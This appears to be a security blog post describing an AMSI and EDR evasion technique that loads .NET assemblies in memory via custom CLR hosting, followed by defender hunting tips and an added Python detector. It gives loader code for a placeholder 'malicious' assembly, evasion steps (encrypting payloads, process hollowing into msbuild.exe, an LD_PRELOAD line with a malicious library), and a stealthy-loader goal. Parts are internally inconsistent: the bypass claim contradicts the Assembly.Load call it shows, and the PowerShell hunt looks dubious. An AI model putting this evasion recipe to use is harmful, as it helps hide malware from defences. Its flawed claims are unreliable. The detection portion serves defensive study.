Link: AMSI Bypass Without AMSI Bypass
Researchers Itay Yashar and Omer Golan revisited an overlooked technique allowing .NET assemblies to load directly from memory without triggering AMSI (Antimalware Scan Interface). By customizing the CLR (Common Language Runtime) via hosting interfaces, they achieved fully silent execution, evading EDR (Endpoint Detection and Response) detection.
You Should Know:
1. Key Concepts
- AMSI Bypass: Traditionally, attackers patch or disable AMSI to evade detection. This method avoids direct AMSI manipulation.
- CLR Hosting: Custom CLR hosting allows loading .NET assemblies in-memory without disk writes.
- EDR Evasion: No suspicious API calls or file drops, reducing detection likelihood.
2. Practical Implementation
Step 1: Custom CLR Hosting Setup
Use `ICLRMetaHost`, `ICLRRuntimeInfo`, and `ICLRRuntimeHost` to load the CLR manually (the documented .NET Framework hosting interfaces from `metahost.h`):
```cpp
#include <windows.h>
#include <metahost.h>
#pragma comment(lib, "mscoree.lib")

// Manually host the .NET Framework 4 CLR inside the current process using the
// documented hosting chain: ICLRMetaHost -> ICLRRuntimeInfo -> ICLRRuntimeHost.
void LoadCLR() {
    ICLRMetaHost    *pMetaHost    = NULL;
    ICLRRuntimeInfo *pRuntimeInfo = NULL;
    ICLRRuntimeHost *pRuntimeHost = NULL;

    // CLRCreateInstance is exported by mscoree.dll, so mscoree.dll is mapped first.
    HRESULT hr = CLRCreateInstance(CLSID_CLRMetaHost, IID_ICLRMetaHost, (LPVOID *)&pMetaHost);
    if (FAILED(hr)) return;

    // Select the v4 runtime by version string.
    hr = pMetaHost->GetRuntime(L"v4.0.30319", IID_ICLRRuntimeInfo, (LPVOID *)&pRuntimeInfo);
    if (FAILED(hr)) return;

    // Obtain the hosting interface for that runtime.
    hr = pRuntimeInfo->GetInterface(CLSID_CLRRuntimeHost, IID_ICLRRuntimeHost, (LPVOID *)&pRuntimeHost);
    if (FAILED(hr)) return;

    // Initialise the runtime; clr.dll is loaded into the process at this point.
    pRuntimeHost->Start();
}
```
Step 2: In-Memory Assembly Loading
Load a .NET assembly (`byte[]`) without touching disk:
```csharp
using System.Reflection;

// GetMaliciousAssembly() is a placeholder from the original post that returns
// the raw bytes of the assembly to be loaded.
byte[] assemblyBytes = GetMaliciousAssembly();
Assembly.Load(assemblyBytes);
```
Step 3: Bypassing AMSI Without Direct Patching
Since AMSI scans assembly loads via `Assembly.Load`, this method avoids AMSI hooks by using custom CLR hosting.
3. Detection Avoidance Techniques
- Avoid `Assembly.LoadFrom`: use low-level CLR APIs instead.
- Obfuscate CLR calls: encrypt assembly bytes and decrypt them in memory.
- Process hollowing: inject into a trusted process (e.g., `msbuild.exe`).
4. Linux Equivalent (For Red Teamers)
While this is Windows-specific, Linux attackers can use:
Memory loading in Linux (e.g., via `LD_PRELOAD`):
```sh
LD_PRELOAD=/path/to/malicious.so /bin/legitimate_program
```
What Undercode Says
This technique highlights how attackers bypass modern defenses without direct API manipulation. Defenders should:
- Monitor CLR hosting API calls (`CLRCreateInstance`, `GetRuntime`).
- Inspect unusual .NET assembly loads in memory.
- Use behavioral detection (e.g., unexpected CLR initialization).
For blue teams:
Hunt for suspicious CLR hosting:
```powershell
Get-WinEvent -LogName "Microsoft-Windows-DotNETRuntime/Start" | Where-Object { $_.Message -match "ICLRMetaHost" }
```
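A practical way to act on the "unexpected CLR initialization" advice above is to look for the CLR's own modules being loaded into processes that are not known managed hosts: `CLRCreateInstance` lives in `mscoree.dll`, and `ICLRRuntimeHost::Start` maps `clr.dll`, so an image-load record for either of those in an unmanaged binary is a direct trace of the hosting chain described in Step 1. The script below is an added example, not part of the original post or the researchers' material; it runs over constructed Sysmon-style Event ID 7 (image load) records flattened to `key=value` pairs, and the `EXPECTED_CLR_HOSTS` allowlist, the field names and the sample events are assumptions to be tuned to a real environment.

```python
"""Flag processes that load the .NET CLR although they are not expected managed hosts.

Added example: parses constructed Sysmon-style image-load records (Event ID 7,
flattened to ProcessId=...|Image=...|ImageLoaded=...) and reports any process
outside an allowlist of known .NET hosts that maps a CLR module.
"""
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional

# Modules whose load marks CLR hosting: mscoree.dll exports CLRCreateInstance,
# clr.dll / clrjit.dll are mapped when the v4 runtime starts, coreclr.dll for .NET Core.
CLR_MODULES = {"mscoree.dll", "clr.dll", "clrjit.dll", "coreclr.dll"}

# Assumed allowlist of image names that legitimately host the CLR. This is a
# constructed starting point, not an exhaustive list; baseline your own estate.
EXPECTED_CLR_HOSTS = {"powershell.exe", "msbuild.exe", "devenv.exe", "w3wp.exe", "dotnet.exe"}


@dataclass(frozen=True)
class ImageLoad:
    process_id: int
    image: str        # full path of the process executable
    loaded: str       # full path of the DLL that was mapped


def parse_sysmon_line(line: str) -> Optional[ImageLoad]:
    """Parse one flattened record; return None for malformed lines instead of raising."""
    try:
        fields = dict(part.split("=", 1) for part in line.strip().split("|"))
        return ImageLoad(int(fields["ProcessId"]), fields["Image"], fields["ImageLoaded"])
    except (ValueError, KeyError):
        return None


def basename(path: str) -> str:
    """Case-insensitive file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def find_unexpected_clr_hosts(lines: Iterable[str]) -> List[Dict[str, object]]:
    """Return one alert per (pid, image) that loads a CLR module without being an expected host."""
    alerts: List[Dict[str, object]] = []
    seen = set()
    for line in lines:
        ev = parse_sysmon_line(line)
        if ev is None:
            continue
        module = basename(ev.loaded)
        host = basename(ev.image)
        if module not in CLR_MODULES or host in EXPECTED_CLR_HOSTS:
            continue
        key = (ev.process_id, host)
        if key in seen:          # report each hosting process once, on its first CLR module
            continue
        seen.add(key)
        alerts.append({"pid": ev.process_id, "image": ev.image, "module": module})
    return alerts


# Constructed sample events: an unmanaged notepad.exe pulling in the CLR (the
# hosting pattern), a normal PowerShell CLR load, and an unrelated DLL load.
SAMPLE_EVENTS = [
    "ProcessId=4120|Image=C:\\Windows\\System32\\notepad.exe|ImageLoaded=C:\\Windows\\System32\\mscoree.dll",
    "ProcessId=4120|Image=C:\\Windows\\System32\\notepad.exe|ImageLoaded=C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\clr.dll",
    "ProcessId=3088|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|ImageLoaded=C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\clr.dll",
    "ProcessId=1204|Image=C:\\Windows\\explorer.exe|ImageLoaded=C:\\Windows\\System32\\kernel32.dll",
    "this line is deliberately malformed",
]

if __name__ == "__main__":
    for alert in find_unexpected_clr_hosts(SAMPLE_EVENTS):
        print(f"[!] pid {alert['pid']} {alert['image']} loaded {alert['module']} (unexpected CLR host)")
```

Because a trusted-process injection target such as `msbuild.exe` is itself a legitimate CLR host, an allowlist alone will not catch that variant; pairing this check with the parent-process and command-line context of the host, or with memory scans for unbacked executable regions in managed processes, closes that gap.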
Expected Output:
A stealthy .NET loader that evades AMSI and EDR by leveraging custom CLR hosting.
Prediction
Future EDRs will likely enhance CLR telemetry, forcing attackers to use even lower-level techniques (e.g., direct CLR manipulation via unmanaged code).
Reported By: Omer Golan – Hackers Feeds